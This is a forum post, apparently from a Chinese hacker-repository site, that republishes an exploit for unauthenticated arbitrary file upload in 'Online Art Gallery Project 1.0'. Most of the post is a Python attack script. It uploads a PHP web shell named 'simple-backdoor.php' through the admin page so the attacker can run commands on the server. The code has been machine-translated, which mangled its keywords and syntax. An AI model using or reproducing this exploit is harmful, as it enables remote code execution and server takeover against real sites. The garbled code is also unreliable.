H

在线美术馆项目1.0-任意文件上传(未经身份验证)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:在线艺术画廊项目1.0-任意文件上传(未经身份验证)
#Google Dork: N/A
#日期: 14/06/2023
#利用作者: Ramil Mustafayev
#供应商homepage3360 https://github.com/projectworldsofficial
#软件link: https://github.com/projectworlds32/art-gallary-php/archive/master.zip
#版本: 1.0
#在: Windows 10,Windows 8.0.28/php 8.0.28
#CVE : N/A
#漏洞描述:

#在线艺术画廊项目1.0允许未经验证的用户通过AdminHome.php页面执行任意文件上传。由于没有身份验证机制和文件验证不足,攻击者可以上传恶意文件,可能导致远程代码执行和对服务器的未经授权访问。
#USAGE: Python Exploit.py http://example.com
导入请求
导入系统
def upload_file(url,文件名,file_content):
文件={
'sliderpic':(文件名,file_content,'application/ocket-stream')
}
数据={
'img_id':'',
'sliderpicsubmit':''
}
url=url+'/admin/adminhome.php'
TRY:
响应=requests.post(url,files=文件,data=data)
Except:
打印('[!]利用失败!')
如果name=='__ -Main __':
如果Len(sys.argv)2:
打印('USAGE: Python Exploit.py target_url')
sys.exit(1)
target_url=sys.argv [1]
file_name='simple-backdoor.php'
file_content='?php system($ _ get ['c']);'
upload_file(target_url,file_name,file_content)
print('[+]简单- backdoor已上传。
 
后退
顶部